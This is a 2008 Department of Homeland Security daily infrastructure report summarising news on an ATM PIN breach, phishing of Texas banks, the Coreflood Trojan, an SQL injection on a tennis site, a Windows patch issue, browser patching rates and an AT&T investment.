Department of Homeland Security Daily Open Source Infrastructure Report

Thursday, July 3, 2008

Daily Report

Over the past four decades numerous studies have shown that pesticides can move downward from the land surface through the unsaturated zone to reach the water table at detectable concentrations. (See item 22)

IDG News Service reports writers of Coreflood Trojan horse program have managed to infect hundreds of thousands of computers – including more than 14,000 within one unnamed global hotel chain. (See item 32)

Banking and Finance Sector

8. July 1, Associated Press – (National) Citibank ATM breach reveals PIN security problems. Hackers broke into Citibank’s network of ATMs inside 7-Eleven stores and stole customers’ PIN codes, according to recent court filings that revealed a disturbing security hole in the most sensitive part of a banking record. The scam netted the alleged identity thieves millions of dollars. It also indicates criminals were able to access personal identification numbers (PINs) by attacking the back-end computers responsible for approving the cash withdrawals. The case against three people in U.S. District Court for the Southern District of New York highlights a significant problem. Hackers are targeting the ATM system’s infrastructure, which is increasingly built on Microsoft Corp.’s Windows operating system and allows machines to be remotely diagnosed and repaired over the Internet. Despite industry standards that call for protecting PINs with strong encryption some ATM operators apparently are not properly doing that. The PINs seem to be leaking while in transit between the ATMs and the computers that process the transactions. It is unclear how many Citibank customers were affected by the breach, which extended at least from October 2007 to March 2008 and was first reported by The bank has nearly 5,700 Citibank-branded ATMs inside 7-Eleven Inc. stores throughout the U.S., but it does not own or operate any of them.


9. July 1, KBMT 12 Beaumont – (Texas) BBB issues alert for phishing attack on area banks. The Better Business Bureau (BBB) in Southeast Texas warns all businesses and consumers in the area of a spoofing scam using area banks to entice recipients to give personal information. Orange Savings Bank was targeted last month and the BBB has been flooded by calls today regarding Franklin Bank. Consumers are receiving automated phone calls, along with e-mails and even text messages, some late at night, asking for personal information.


Information Technology

32. July 2, IDG News Service – (National) Trojan lurks, waiting to steal admin passwords. Writers of a password-stealing Trojan horse program have managed to infect hundreds of thousands of computers – including more than 14,000 within one unnamed global hotel chain – by waiting for system administrators to log onto infected PCs and then using a Microsoft administration tool to spread their malicious software throughout the network. The criminals behind the Coreflood Trojan are using the software to steal banking and brokerage account usernames and passwords. They have amassed a 50G-byte database of this information from the machines they have infected, according to the director of malware research with security vendor SecureWorks. Since Microsoft shipped its Windows XP Service Pack 2 software with its locked-down security features, hackers have had a hard time finding ways to spread malicious software throughout corporate networks. Widespread worm or virus outbreaks soon dropped off after the software’s August 2004 release. But the Coreflood hackers have been successful, thanks in part to a Microsoft program called PsExec, which was written to help system administrators run legitimate software on computers across their networks. Over the past 16 months, Coreflood’s authors have infected more than 378,000 computers. SecureWorks has counted thousands of infections in university networks and has found financial companies, hospitals, law firms, and even a U.S. state police agency that have had hundreds of infections.


33. July 2, Computerworld – (International) SQL attacks lobs onto ATP site. Visitors to the Association of Tennis Professionals (ATP) web site have potentially been infected with spyware after apparent lax security allowed a malicious script to be injected across its pages. The SQL injection attack acts as a conduit for spyware and trojans to be downloaded to victims’ machines. While the manner of attack is nothing new, Microsoft’s Technet warned it has detected an increase in the type of attack on Web sites using Microsoft ASP and ASP.NET. It attributes the vulnerability to poor Web application security practices, rather than product flaws. “These SQL injection attacks do not exploit a specific software vulnerability, but instead target Web sites that do not follow secure coding practices for accessing and manipulating data stored in a relational database,” the site reads. “When a SQL injection attack succeeds, an attacker can compromise data stored in these databases and possibly execute remote code. Clients browsing to a compromised server could be forwarded unknowingly to malicious sites that may install malware on the client machine.”


34. July 1, Ars Technica – (International) x64 Kernel patch causes random restarts, fix on the way. Microsoft has disclosed that update 932596, a patch released for the Kernel Patch Protection feature that is included with x64 versions of Windows Server 2003, Windows Vista, and Windows Server 2008, seems to be causing random restarts on certain machines. A Stop error is then generated (error code 0x0000001E, 0x000000D1, or another Stop error code). Windows x86 versions are not affected since they do not include the Kernel Patch Protection feature (also known as PatchGuard), a technology that is meant to prevent third-party interventions into the core of the operating system. According to KB article 950772, Microsoft has a hotfix ready but has not yet released it.


35. July 1, IDG News Service – (International) Study: Unpatched Web browsers prevalent on the internet. Only 59.1 percent of people use up-to-date, fully patched Web browsers, putting the remainder at risk from growing threats from diligent hackers, according to a new study published by researchers in Switzerland. The study, conducted by researchers at The Swiss Federal Institute of Technology, Google and IBM Internet Security Services and published Tuesday, is one of the most comprehensive analyses of what versions of Web browsers people are using on the Internet. Web browsers are often a weak link in the security chain, as software vulnerabilities can make it easy for hackers to gain control of a PC. When that happens, hackers can perform malicious acts such as stealing personal data or turning PCs into spam-spewing drones. What the researchers found is that although software vendors provide patches for security problems, it can take days, weeks, or months before people update their applications. In the meantime, those users are at risk.


Communications Sector

36. July 1, Memphis Business Journal – (Tennessee) AT&T to invest $400M in Tenn. infrastructure. AT&T Inc. will invest $400 million in the implementation of new video services in Tennessee, the company announced Tuesday. The telecom giant will offer video services that necessitate fiber network upgrades, further broadband deployment, and Internet-based technologies, the company said. AT&T’s planned infrastructure will for the first time bring its U-verse services, video carried over internet protocol, to the state. The move is a result of a new state law AT&T had lobbied for. AT&T-backed House Bill 1421, signed into law in May, was met with resistance last year from the cable industry, and primarily Comcast Corp. In the past, local governments had jurisdiction over who is allowed to provide information and entertainment services using their towns’ right-of-ways. The new law, which creates a single statewide franchise agreement instead of negotiating with each municipality separately, opened the door for AT&T to offer its television services in Tennessee.